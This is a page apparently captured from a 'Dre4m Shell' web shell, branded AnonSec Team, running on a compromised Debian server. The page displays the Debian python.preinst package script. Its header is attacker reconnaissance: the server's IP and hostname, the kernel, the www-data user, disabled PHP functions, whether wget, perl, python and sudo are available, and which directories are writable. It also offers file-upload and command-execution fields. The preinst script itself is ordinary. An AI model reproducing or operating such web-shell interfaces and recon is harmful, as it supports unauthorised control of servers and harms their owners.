Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.135.204.198
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/lib/dpkg/info/python.preinst
#! /bin/sh
set -e

# remove the python alternatives before installing our own python link

update-alternatives --auto /usr/bin/python >/dev/null 2>&1 || true
update-alternatives --remove python /usr/bin/python1.5 || true
update-alternatives --remove python /usr/bin/python2.1 || true
update-alternatives --remove python /usr/bin/python2.2 || true

[ -L /usr/share/doc/python/html ] || rm -rf /usr/share/doc/python/html

case "$1" in
    upgrade)
        if dpkg --compare-versions $2 lt 2.6.1-1~; then
	    oldv=$(echo $2 | sed 's/^\(...\).*/\1/')
	    if [ "$DEBIAN_FRONTEND" != noninteractive ]; then
		echo "running python pre-rtupdate hooks for python2.7..."
	    fi
	    for hook in /usr/share/python/runtime.d/*.rtupdate; do
		[ -x $hook ] || continue
		if ! $hook pre-rtupdate python$oldv python2.7; then
		    hb=$(basename $hook .rtupdate)
		    echo >&2 "error running python pre-rtupdate hook $hb"
		    echo >&2 "running python failed-pre-rtupdate hook $hb"
		    $hook failed-pre-rtupdate python$oldv python2.7
		    errors=yes
		    break
		fi
	    done
	    [ -z "$errors" ] || exit 3
	fi

	# 2.4.4-5 is the first version, which adds python2.5 as supported
	# version; need to run an rtinstall python2.5 in the postinst.
        if dpkg --compare-versions $2 lt 2.4.4-5 && [ -x /usr/bin/python2.5 ]; then
	    version=$(dpkg -s python2.5-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.5_already_installed
	fi

	# 2.5.4-6 is the first version, which adds python2.6 as supported
	# version; need to run an rtinstall python2.6 in the postinst.
        if dpkg --compare-versions $2 lt 2.5.4-6 && [ -x /usr/bin/python2.6 ]; then
	    version=$(dpkg -s python2.6-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.6_already_installed
	fi

	# 2.6.6-13 is now the first version, which adds python2.7 as supported
	# version; need to run an rtinstall python2.7 in the postinst.
        if dpkg --compare-versions $2 lt 2.6.6-13 && [ -x /usr/bin/python2.7 ]; then
	    version=$(dpkg -s python2.7-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.7_already_installed
	fi
esac



Anon7 - 2022
AnonSec Team